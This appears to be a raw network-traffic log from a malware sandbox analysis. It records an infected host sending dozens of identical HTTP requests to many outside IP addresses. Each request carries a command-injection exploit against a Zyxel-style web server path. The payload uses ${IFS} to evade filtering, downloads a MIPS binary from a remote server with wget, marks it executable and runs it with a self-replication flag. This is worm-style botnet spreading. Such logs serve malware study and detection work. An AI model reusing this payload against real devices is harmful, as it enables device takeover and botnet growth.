                                                      Feb 2, 2024 06:35:39.331362963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1018192.168.2.145229689.61.135.202443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.331445932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1019192.168.2.1436430212.29.78.137443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.331469059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1020192.168.2.1459726160.98.4.130443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.331513882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1021192.168.2.1460098171.83.12.31443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.331558943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1022192.168.2.1442382201.65.245.66443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.331631899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1023192.168.2.1442946143.169.65.61443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.331634045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1024192.168.2.144741437.164.3.18443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.331702948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1025192.168.2.1436530209.237.227.146443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.331760883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1026192.168.2.1447514112.10.5.178443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.331800938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1027192.168.2.145341445.85.70.144443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.331840992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1028192.168.2.1460724186.88.132.117443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.331876040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1029192.168.2.1450196160.92.112.137443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.331897974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1030192.168.2.145131261.94.255.227443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.331945896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1031192.168.2.1453968165.128.107.45443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.331979036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1032192.168.2.1442418107.182.169.129443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.332006931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1033192.168.2.1445108222.52.212.185443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.332041979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1034192.168.2.145492035.175.109.96443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.332118988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1035192.168.2.144593693.17.190.243443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.332123995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1036192.168.2.144197254.198.238.124443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.332195044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1037192.168.2.145004870.129.10.51443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.332210064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1038192.168.2.1435938157.112.60.72443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.332257986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1039192.168.2.143832698.71.145.82443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.332324028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1040192.168.2.1445620156.184.61.239443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.332364082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1041192.168.2.1457158198.108.171.8443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.332396030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1042192.168.2.144990049.12.115.58443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.332439899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1043192.168.2.1435120223.63.102.13443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.332480907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1044192.168.2.1457474219.136.213.8443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.332572937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1045192.168.2.1438766180.16.137.150443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.332652092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1046192.168.2.143990425.201.77.43443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.332655907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1047192.168.2.144542066.223.185.235443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.332716942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1048192.168.2.1459628186.147.81.245443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.332729101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1049192.168.2.1447576199.176.28.248443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.332779884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1050192.168.2.145165413.166.6.192443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.332834005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1051192.168.2.145836254.23.107.197443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.332875013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1052192.168.2.1450694172.151.50.243443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.332921028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1053192.168.2.143588235.170.35.214443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.332957029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1054192.168.2.143658240.90.57.43443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.333003998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1055192.168.2.143539073.223.252.60443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.333048105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1056192.168.2.1438090114.166.124.21443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.333087921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1057192.168.2.145662273.180.95.46443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.333134890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1058192.168.2.144974494.111.50.12443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.333180904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1059192.168.2.1446918123.180.96.175443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.333213091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1060192.168.2.1458166115.161.189.1443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.333245039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1061192.168.2.1432886199.206.16.18443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.333311081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1062192.168.2.145767488.179.29.10443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.333369970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1063192.168.2.1432790153.53.163.212443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.333431959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1064192.168.2.144611486.87.19.51443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.333482027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1065192.168.2.1435766209.245.88.164443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.333506107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1066192.168.2.1451056144.74.91.236443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.333586931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1067192.168.2.1457814117.253.89.115443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.333635092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1068192.168.2.1435914145.223.173.134443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.333661079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1069192.168.2.1435750114.98.197.188443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.333692074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1070192.168.2.1436596138.160.241.156443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.333759069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1071192.168.2.144797059.101.230.51443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.333847046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1072192.168.2.145430888.114.58.248443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.333898067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1073192.168.2.1454356153.255.162.248443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.333906889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1074192.168.2.1444902167.40.114.173443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.333935976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1075192.168.2.1434012110.18.174.156443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.333967924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1076192.168.2.144939483.52.129.159443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.334016085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1077192.168.2.144178613.107.79.175443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.334067106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1078192.168.2.1435518219.143.243.212443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.334182024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1079192.168.2.1435280191.124.28.53443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.334203959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1080192.168.2.1445350194.243.59.141443
                                                      TimestampBytes transferredDirectionData
